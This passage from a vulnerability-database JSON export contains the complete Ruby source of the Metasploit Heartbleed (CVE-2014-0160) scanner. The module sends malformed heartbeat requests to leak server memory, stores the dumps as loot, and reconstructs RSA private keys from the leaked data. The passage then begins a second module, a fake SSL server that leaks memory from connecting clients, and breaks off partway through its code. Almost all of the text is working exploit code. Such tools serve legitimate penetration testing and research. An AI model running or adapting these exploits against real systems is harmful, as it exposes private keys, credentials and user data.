requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable. The module supports several actions, allowing for scanning, dumping of memory contents to loot, and private key recovery. The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP. The repeat command can be used to make running the SCAN or DUMP many times more powerful. As in: repeat -t 60 run; sleep 2 To run every two seconds for one minute.\n", "modified": "2018-11-16T18:18:28", "published": "2014-04-18T13:16:28", "id": "MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED", "href": "", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# TODO: Connection reuse: Only connect once and send subsequent heartbleed requests.\n# We tried it once in https://github.com/rapid7/metasploit-framework/pull/3300\n# but there were too many errors\n# TODO: Parse the rest of the server responses and return a hash with the data\n# TODO: Extract the relevant functions and include them in the framework\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n CIPHER_SUITES = [\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\n 0x00ff # Unknown\n ]\n\n SSL_RECORD_HEADER_SIZE = 0x05\n HANDSHAKE_RECORD_TYPE = 0x16\n HEARTBEAT_RECORD_TYPE = 0x18\n ALERT_RECORD_TYPE = 0x15\n HANDSHAKE_SERVER_HELLO_TYPE = 0x02\n HANDSHAKE_CERTIFICATE_TYPE = 0x0b\n HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c\n HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e\n\n TLS_VERSION = {\n 'SSLv3' => 0x0300,\n '1.0' => 0x0301,\n '1.1' => 0x0302,\n '1.2' => 0x0303\n }\n\n TLS_CALLBACKS = {\n 'SMTP' => :tls_smtp,\n 'IMAP' => :tls_imap,\n 'JABBER' => :tls_jabber,\n 'POP3' => :tls_pop3,\n 'FTP' => :tls_ftp,\n 'POSTGRES' => :tls_postgres\n }\n\n # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252\n SAFE_CHECK_MAX_RECORD_LENGTH = (1 << 14)\n\n # For verbose output, deduplicate repeated characters beyond this threshold\n DEDUP_REPEATED_CHARS_THRESHOLD = 400\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\n 'Description' => %q{\n This module implements the OpenSSL Heartbleed attack. The problem\n exists in the handling of heartbeat requests, where a fake length can\n be used to leak memory data in the response. Services that support\n STARTTLS may also be vulnerable.\n\n The module supports several actions, allowing for scanning, dumping of\n memory contents to loot, and private key recovery.\n\n The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.\n\n The repeat command can be used to make running the SCAN or DUMP many\n times more powerful. As in:\n repeat -t 60 run; sleep 2\n To run every two seconds for one minute.\n },\n 'Author' => [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\n 'FiloSottile', # PoC site and tool\n 'Christian Mehlmauer', # Msf module\n 'wvu', # Metasploit module\n 'juan vazquez', # Metasploit module\n 'Sebastiano Di Paola', # Msf module\n 'Tom Sellers', # Metasploit module\n 'jjarmoc', # Metasploit module; keydump, refactoring..\n 'Ben Buchanan', #Metasploit module\n 'herself' #Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ],\n [ 'URL', 'https://github.com/FiloSottile/Heartbleed' ],\n [ 'URL', 'https://gist.github.com/takeshixx/10107280' ],\n [ 'URL', 'http://filippo.io/Heartbleed/' ]\n ],\n 'DisclosureDate' => '2014-04-07',\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n ['SCAN', {'Description' => 'Check hosts for vulnerability'}],\n ['DUMP', {'Description' => 'Dump memory contents to loot'}],\n ['KEYS', {'Description' => 'Recover private keys from memory'}]\n ],\n 'DefaultAction' => 'SCAN',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, \"None\" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),\n OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),\n OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),\n OptInt.new('STATUS_EVERY', [true, 'How many retries until key dump status', 5]),\n OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),\n OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),\n OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])\n ])\n\n register_advanced_options(\n [\n OptInt.new('HEARTBEAT_LENGTH', [true, 'Heartbeat length', 65535]),\n OptString.new('XMPPDOMAIN', [true, 'The XMPP Domain to use when Jabber is selected', 'localhost'])\n ])\n\n end\n\n #\n # Main methods\n #\n\n # Called when using check\n def check_host(ip)\n @check_only = true\n vprint_status \"Checking for Heartbleed exposure\"\n if bleed\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n # Main method\n def run\n if heartbeat_length > 65535 || heartbeat_length < 0\n print_error('HEARTBEAT_LENGTH should be a natural number less than 65536')\n return\n end\n\n if response_timeout < 0\n print_error('RESPONSE_TIMEOUT should be bigger than 0')\n return\n end\n\n super\n end\n\n # Main method\n def run_host(ip)\n case action.name\n # SCAN and DUMP are similar, but DUMP stores loot\n when 'SCAN', 'DUMP'\n # 'Tis but a scratch\n bleeded = ''\n\n 1.upto(leak_count) do |count|\n vprint_status(\"Leaking heartbeat response ##{count}\")\n bleeded << bleed.to_s\n end\n\n loot_and_report(bleeded)\n when 'KEYS'\n get_keys\n else\n # Shouldn't get here, since Action is Enum\n print_error(\"Unknown Action: #{action.name}\")\n end\n\n # ensure all connections are closed\n disconnect\n end\n\n #\n # DATASTORE values\n #\n\n # If this is merely a check, set to the RFC-defined\n # maximum padding length of 2^14. See:\n # https://tools.ietf.org/html/rfc6520#section-4\n # https://github.com/rapid7/metasploit-framework/pull/3252\n def heartbeat_length\n if @check_only\n SAFE_CHECK_MAX_RECORD_LENGTH\n else\n datastore['HEARTBEAT_LENGTH']\n end\n end\n\n def response_timeout\n datastore['RESPONSE_TIMEOUT']\n end\n\n def tls_version\n datastore['TLS_VERSION']\n end\n\n def dumpfilter\n datastore['DUMPFILTER']\n end\n\n def max_keytries\n datastore['MAX_KEYTRIES']\n end\n\n def xmpp_domain\n datastore['XMPPDOMAIN']\n end\n\n def status_every\n datastore['STATUS_EVERY']\n end\n\n def tls_callback\n datastore['TLS_CALLBACK']\n end\n\n def leak_count\n datastore['LEAK_COUNT']\n end\n\n #\n # TLS Callbacks\n #\n\n def tls_smtp\n # https://tools.ietf.org/html/rfc3207\n get_data\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\r\\n\")\n res = get_data\n\n unless res && res =~ /STARTTLS/\n return nil\n end\n sock.put(\"STARTTLS\\r\\n\")\n get_data\n end\n\n def tls_imap\n # http://tools.ietf.org/html/rfc2595\n get_data\n sock.put(\"a001 CAPABILITY\\r\\n\")\n res = get_data\n unless res && res =~ /STARTTLS/i\n return nil\n end\n sock.put(\"a002 STARTTLS\\r\\n\")\n get_data\n end\n\n def tls_postgres\n # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3\n # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html\n get_data\n # the postgres SSLRequest packet is a int32(8) followed by a int16(1234),\n # int16(5679) in network format\n psql_sslrequest = [8].pack('N')\n psql_sslrequest << [1234, 5679].pack('n*')\n sock.put(psql_sslrequest)\n res = get_data\n unless res && res =~ /S/\n return nil\n end\n res\n end\n\n def tls_pop3\n # http://tools.ietf.org/html/rfc2595\n get_data\n sock.put(\"CAPA\\r\\n\")\n res = get_data\n if res.nil? || res =~ /^-/ || res !~ /STLS/\n return nil\n end\n sock.put(\"STLS\\r\\n\")\n res = get_data\n if res.nil? || res =~ /^-/\n return nil\n end\n res\n end\n\n def jabber_connect_msg(hostname)\n # http://xmpp.org/extensions/xep-0035.html\n msg = \"<stream:stream xmlns='jabber:client' \"\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\n msg << \"version='1.0' \"\n msg << \"to='#{hostname}'>\"\n end\n\n def tls_jabber\n sock.put(jabber_connect_msg(xmpp_domain))\n res = get_data\n if res && res.include?('host-unknown')\n jabber_host = res.match(/ from='([\\w.]*)' /)\n if jabber_host && jabber_host[1]\n disconnect\n establish_connect\n vprint_status(\"Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...\")\n sock.put(jabber_connect_msg(jabber_host[1]))\n res = get_data\n end\n end\n if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['\"]urn:ietf:params:xml:ns:xmpp-tls['\"]/\n vprint_error(\"Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res.include?('host-unknown')\n return nil\n end\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\n sock.put(msg)\n res = get_data\n return nil if res.nil? || !res.include?('<proceed')\n res\n end\n\n def tls_ftp\n # http://tools.ietf.org/html/rfc4217\n res = get_data\n return nil if res.nil?\n sock.put(\"AUTH TLS\\r\\n\")\n res = get_data\n return nil if res.nil?\n if res !~ /^234/\n # res contains the error message\n vprint_error(\"FTP error: #{res.strip}\")\n return nil\n end\n res\n end\n\n #\n # Helper Methods\n #\n\n # Get data from the socket\n # this ensures the requested length is read (if available)\n def get_data(length = -1)\n to_receive = length\n data = ''\n done = false\n while done == false\n begin\n temp = sock.get_once(to_receive, response_timeout)\n rescue EOFError\n break\n end\n\n break if temp.nil?\n\n data << temp\n if length != -1\n to_receive -= temp.length\n done = true if to_receive <= 0\n end\n end\n\n data\n end\n\n def to_hex_string(data)\n data.each_byte.map { |b| sprintf('%02X ', b) }.join.strip\n end\n\n # establishes a connect and parses the server response\n def establish_connect\n connect\n\n unless tls_callback == 'None'\n vprint_status(\"Trying to start SSL via #{tls_callback}\")\n res = self.send(TLS_CALLBACKS[tls_callback])\n if res.nil?\n vprint_error(\"STARTTLS failed...\")\n return nil\n end\n end\n\n vprint_status(\"Sending Client Hello...\")\n sock.put(client_hello)\n\n server_resp = get_server_hello\n\n if server_resp.nil?\n vprint_error(\"Server Hello Not Found\")\n return nil\n end\n\n server_resp\n end\n\n # Generates a heartbeat request\n def heartbeat_request(length)\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\n payload << [length].pack('n') # Payload Length: 65535\n\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\n end\n\n # Generates, sends and receives a heartbeat message\n def bleed\n connect_result = establish_connect\n return if connect_result.nil?\n\n vprint_status(\"Sending Heartbeat...\")\n sock.put(heartbeat_request(heartbeat_length))\n hdr = get_data(SSL_RECORD_HEADER_SIZE)\n if hdr.nil? || hdr.empty?\n vprint_error(\"No Heartbeat response...\")\n disconnect\n return\n end\n\n unpacked = hdr.unpack('Cnn')\n type = unpacked[0]\n version = unpacked[1] # must match the type from client_hello\n len = unpacked[2]\n\n # try to get the TLS error\n if type == ALERT_RECORD_TYPE\n res = get_data(len)\n alert_unp = res.unpack('CC')\n alert_level = alert_unp[0]\n alert_desc = alert_unp[1]\n\n # http://tools.ietf.org/html/rfc5246#section-7.2\n case alert_desc\n when 0x46\n msg = 'Protocol error. Looks like the chosen protocol is not supported.'\n else\n msg = 'Unknown error'\n end\n vprint_error(\"#{msg}\")\n disconnect\n return\n end\n\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version]\n vprint_error(\"Unexpected Heartbeat response header (#{to_hex_string(hdr)})\")\n disconnect\n return\n end\n\n heartbeat_data = get_data(heartbeat_length)\n vprint_status(\"Heartbeat response, #{heartbeat_data.length} bytes\")\n disconnect\n heartbeat_data\n end\n\n # Stores received data\n def loot_and_report(heartbeat_data)\n if heartbeat_data.to_s.empty?\n vprint_error(\"Looks like there isn't leaked information...\")\n return\n end\n\n print_good(\"Heartbeat response with leak, #{heartbeat_data.length} bytes\")\n report_vuln({\n :host => rhost,\n :port => rport,\n :name => self.name,\n :refs => self.references,\n :info => \"Module #{self.fullname} successfully leaked info\"\n })\n\n if action.name == 'DUMP' # Check mode, dump if requested.\n pattern = dumpfilter\n if pattern\n match_data = heartbeat_data.scan(pattern).join\n else\n match_data = heartbeat_data\n end\n path = store_loot(\n 'openssl.heartbleed.server',\n 'application/octet-stream',\n rhost,\n match_data,\n nil,\n 'OpenSSL Heartbleed server memory'\n )\n print_good(\"Heartbeat data stored in #{path}\")\n end\n\n # Convert non-printable characters to periods\n printable_data = heartbeat_data.gsub(/[^[:print:]]/, '.')\n\n # Keep this many duplicates as padding around the deduplication message\n duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round\n\n # Remove duplicate characters\n abbreviated_data = printable_data.gsub(/(.)\\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) do |s|\n s[0, duplicate_pad] +\n ' repeated ' + (s.length - (2 * duplicate_pad)).to_s + ' times ' +\n s[-duplicate_pad, duplicate_pad]\n end\n\n # Show abbreviated data\n vprint_status(\"Printable info leaked:\\n#{abbreviated_data}\")\n end\n\n #\n # Keydumping helper methods\n #\n\n # Tries to retreive the private key\n def get_keys\n connect_result = establish_connect\n disconnect\n return if connect_result.nil?\n\n print_status(\"Scanning for private keys\")\n count = 0\n\n print_status(\"Getting public key constants...\")\n n, e = get_ne\n\n if n.nil? || e.nil?\n print_error(\"Failed to get public key, aborting.\")\n end\n\n vprint_status(\"n: #{n}\")\n vprint_status(\"e: #{e}\")\n print_status(\"#{Time.now.getutc} - Starting.\")\n\n max_keytries.times {\n # Loop up to MAX_KEYTRIES times, looking for keys\n if count % status_every == 0\n print_status(\"#{Time.now.getutc} - Attempt #{count}...\")\n end\n\n bleedresult = bleed\n return unless bleedresult\n\n p, q = get_factors(bleedresult, n) # Try to find factors in mem\n\n unless p.nil? || q.nil?\n key = key_from_pqe(p, q, e)\n print_good(\"#{Time.now.getutc} - Got the private key\")\n\n print_status(key.export)\n path = store_loot(\n 'openssl.heartbleed.server',\n 'text/plain',\n rhost,\n key.export,\n nil,\n 'OpenSSL Heartbleed Private Key'\n )\n print_status(\"Private key stored in #{path}\")\n return\n end\n count += 1\n }\n print_error(\"Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.\")\n end\n\n # Returns the N and E params from the public server certificate\n def get_ne\n unless @cert\n print_error(\"No certificate found\")\n return\n end\n\n return @cert.public_key.params['n'], @cert.public_key.params['e']\n end\n\n # Tries to find pieces of the private key in the provided data\n def get_factors(data, n)\n # Walk through data looking for factors of n\n psize = n.num_bits / 8 / 2\n return if data.nil?\n\n (0..(data.length-psize)).each{ |x|\n # Try each offset of suitable length\n can = OpenSSL::BN.new(data[x,psize].reverse.bytes.inject {|a,b| (a << 8) + b }.to_s)\n if can > 1 && can % 2 != 0 && can.num_bytes == psize\n # Only try candidates that have a chance...\n q, rem = n / can\n if rem == 0 && can != n\n vprint_good(\"Found factor at offset #{x.to_s(16)}\")\n p = can\n return p, q\n end\n end\n }\n return nil, nil\n end\n\n # Generates the private key from the P, Q and E values\n def key_from_pqe(p, q, e)\n # Returns an RSA Private Key from Factors\n key = OpenSSL::PKey::RSA.new()\n key.set_factors(p, q)\n\n n = key.p * key.q\n phi = (key.p - 1) * (key.q - 1 )\n d = OpenSSL::BN.new(e).mod_inverse(phi)\n\n key.set_key(n, e, d)\n\n dmp1 = key.d % (key.p - 1)\n dmq1 = key.d % (key.q - 1)\n iqmp = key.q.mod_inverse(key.p)\n\n key.set_crt_params(dmp1, dmq1, iqmp)\n\n return key\n end\n\n #\n # SSL/TLS packet methods\n #\n\n # Creates and returns a new SSL record with the provided data\n def ssl_record(type, data)\n record = [type, TLS_VERSION[tls_version], data.length].pack('Cnn')\n record << data\n end\n\n # generates a CLIENT_HELLO ssl/tls packet\n def client_hello\n # Use current day for TLS time\n time_temp = Time.now\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\n\n hello_data = [TLS_VERSION[tls_version]].pack('n') # Version TLS\n hello_data << [time_epoch].pack('N') # Time in epoch format\n hello_data << Rex::Text.rand_text(28) # Random\n hello_data << \"\\x00\" # Session ID length\n hello_data << [CIPHER_SUITES.length * 2].pack('n') # Cipher Suites length (102)\n hello_data << CIPHER_SUITES.pack('n*') # Cipher Suites\n hello_data << \"\\x01\" # Compression methods length (1)\n hello_data << \"\\x00\" # Compression methods: null\n\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\n hello_data_extensions << \"\\x00\\x01\" # Extension length\n hello_data_extensions << \"\\x01\" # Extension data\n\n hello_data << [hello_data_extensions.length].pack('n')\n hello_data << hello_data_extensions\n\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\n data << [hello_data.length].pack('n') # Length\n data << hello_data\n\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\n end\n\n def get_ssl_record\n hdr = get_data(SSL_RECORD_HEADER_SIZE)\n\n unless hdr\n vprint_error(\"No SSL record header received after #{response_timeout} seconds...\")\n return nil\n end\n\n len = hdr.unpack('Cnn')[2]\n data = get_data(len) unless len.nil?\n\n unless data\n vprint_error(\"No SSL record contents received after #{response_timeout} seconds...\")\n return nil\n end\n\n hdr << data\n end\n\n # Get and parse server hello response until we hit Server Hello Done or timeout\n def get_server_hello\n server_done = nil\n ssl_record_counter = 0\n\n remaining_data = get_ssl_record\n\n while remaining_data && remaining_data.length > 0\n ssl_record_counter += 1\n ssl_unpacked = remaining_data.unpack('CH4n')\n return nil if ssl_unpacked.nil? or ssl_unpacked.length < 3\n ssl_type = ssl_unpacked[0]\n ssl_version = ssl_unpacked[1]\n ssl_len = ssl_unpacked[2]\n vprint_status(\"SSL record ##{ssl_record_counter}:\")\n vprint_status(\"\\tType: #{ssl_type}\")\n vprint_status(\"\\tVersion: 0x#{ssl_version}\")\n vprint_status(\"\\tLength: #{ssl_len}\")\n if ssl_type != HANDSHAKE_RECORD_TYPE\n vprint_status(\"\\tWrong Record Type! (#{ssl_type})\")\n else\n ssl_data = remaining_data[5, ssl_len]\n handshakes = parse_handshakes(ssl_data)\n\n # Stop once we receive a SERVER_HELLO_DONE\n if handshakes && handshakes.length > 0 && handshakes[-1][:type] == HANDSHAKE_SERVER_HELLO_DONE_TYPE\n server_done = true\n break\n end\n\n end\n\n remaining_data = get_ssl_record\n end\n\n server_done\n end\n\n # Parse Handshake data returned from servers\n def parse_handshakes(data)\n # Can contain multiple handshakes\n remaining_data = data\n handshakes = []\n handshake_count = 0\n while remaining_data && remaining_data.length > 0\n hs_unpacked = remaining_data.unpack('CCn')\n next if hs_unpacked.nil? or hs_unpacked.length < 3\n hs_type = hs_unpacked[0]\n hs_len_pad = hs_unpacked[1]\n hs_len = hs_unpacked[2]\n hs_data = remaining_data[4, hs_len]\n handshake_count += 1\n vprint_status(\"\\tHandshake ##{handshake_count}:\")\n vprint_status(\"\\t\\tLength: #{hs_len}\")\n\n handshake_parsed = nil\n case hs_type\n when HANDSHAKE_SERVER_HELLO_TYPE\n vprint_status(\"\\t\\tType: Server Hello (#{hs_type})\")\n handshake_parsed = parse_server_hello(hs_data)\n when HANDSHAKE_CERTIFICATE_TYPE\n vprint_status(\"\\t\\tType: Certificate Data (#{hs_type})\")\n handshake_parsed = parse_certificate_data(hs_data)\n when HANDSHAKE_KEY_EXCHANGE_TYPE\n vprint_status(\"\\t\\tType: Server Key Exchange (#{hs_type})\")\n # handshake_parsed = parse_server_key_exchange(hs_data)\n when HANDSHAKE_SERVER_HELLO_DONE_TYPE\n vprint_status(\"\\t\\tType: Server Hello Done (#{hs_type})\")\n else\n vprint_status(\"\\t\\tType: Handshake type #{hs_type} not implemented\")\n end\n\n handshakes << {\n :type => hs_type,\n :len => hs_len,\n :data => handshake_parsed\n }\n remaining_data = remaining_data[(hs_len + 4)..-1]\n end\n\n handshakes\n end\n\n # Parse Server Hello message\n def parse_server_hello(data)\n version = data.unpack('H4')[0]\n vprint_status(\"\\t\\tServer Hello Version: 0x#{version}\")\n random = data[2,32].unpack('H*')[0]\n vprint_status(\"\\t\\tServer Hello random data: #{random}\")\n session_id_length = data[34,1].unpack('C')[0]\n vprint_status(\"\\t\\tServer Hello Session ID length: #{session_id_length}\")\n session_id = data[35,session_id_length].unpack('H*')[0]\n vprint_status(\"\\t\\tServer Hello Session ID: #{session_id}\")\n # TODO Read the rest of the server hello (respect message length)\n\n # TODO: return hash with data\n true\n end\n\n # Parse certificate data\n def parse_certificate_data(data)\n # get certificate data length\n unpacked = data.unpack('Cn')\n cert_len_padding = unpacked[0]\n cert_len = unpacked[1]\n vprint_status(\"\\t\\tCertificates length: #{cert_len}\")\n vprint_status(\"\\t\\tData length: #{data.length}\")\n # contains multiple certs\n already_read = 3\n cert_counter = 0\n while already_read < cert_len\n cert_counter += 1\n # get single certificate length\n single_cert_unpacked = data[already_read, 3].unpack('Cn')\n single_cert_len_padding = single_cert_unpacked[0]\n single_cert_len = single_cert_unpacked[1]\n vprint_status(\"\\t\\tCertificate ##{cert_counter}:\")\n vprint_status(\"\\t\\t\\tCertificate ##{cert_counter}: Length: #{single_cert_len}\")\n certificate_data = data[(already_read + 3), single_cert_len]\n cert = OpenSSL::X509::Certificate.new(certificate_data)\n # First received certificate is the one from the server\n @cert = cert if @cert.nil?\n #vprint_status(\"Got certificate: #{cert.to_text}\")\n vprint_status(\"\\t\\t\\tCertificate ##{cert_counter}: #{cert.inspect}\")\n already_read = already_read + single_cert_len + 3\n end\n\n # TODO: return hash with data\n true\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssl/openssl_heartbleed.rb"}, {"lastseen": "2020-01-22T02:02:37", "bulletinFamily": "exploit", "description": "This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher.\n", "modified": "2018-08-27T18:11:22", "published": "2014-04-09T14:38:11", "id": "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "href": "", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',\n 'Description' => %q{\n This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.\n },\n 'Author' =>\n [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'hdm' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [['Capture']],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture',\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ]\n ],\n 'DisclosureDate' => 'Apr 07 2014',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n\n )\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8443 ]),\n OptInt.new('HEARTBEAT_LIMIT', [true, \"The number of kilobytes of data to capture at most from each client\", 512]),\n OptInt.new('HEARTBEAT_READ', [true, \"The number of bytes to leak in the heartbeat response\", 65535]),\n OptBool.new('NEGOTIATE_TLS', [true, \"Set this to true to negotiate TLS and often leak more data at the cost of CA validation\", false])\n ])\n end\n\n # Initialize the client state and RSA key for this session\n def setup\n super\n @state = {}\n @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?\n end\n\n # Setup the server module and start handling requests\n def run\n print_status(\"Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...\")\n exploit\n end\n\n # Determine how much memory to leak with each request\n def heartbeat_read_size\n datastore['HEARTBEAT_READ'].to_i\n end\n\n # Determine how much heartbeat data to capture at the most\n def heartbeat_limit\n datastore['HEARTBEAT_LIMIT'].to_i * 1024\n end\n\n # Determine whether we should negotiate TLS or not\n def negotiate_tls?\n !! datastore['NEGOTIATE_TLS']\n end\n\n # Initialize a new state for every client\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :heartbeats => \"\",\n :server_random => [Time.now.to_i].pack(\"N\") + Rex::Text.rand_text(28)\n }\n print_status(\"#{@state[c][:name]} Connected\")\n end\n\n # Buffer messages and parse them once they are fully received\n def on_client_data(c)\n data = c.get_once\n return if not data\n @state[c][:buff] ||= \"\"\n @state[c][:buff] << data\n process_request(c)\n end\n\n # Extract TLS messages from the buffer and process them\n def process_request(c)\n\n # Make this slightly harder to DoS\n if @state[c][:buff].to_s.length > (1024*128)\n print_status(\"#{@state[c][:name]} Buffer limit reached, dropping connection\")\n c.close\n return\n end\n\n # Process any buffered messages\n loop 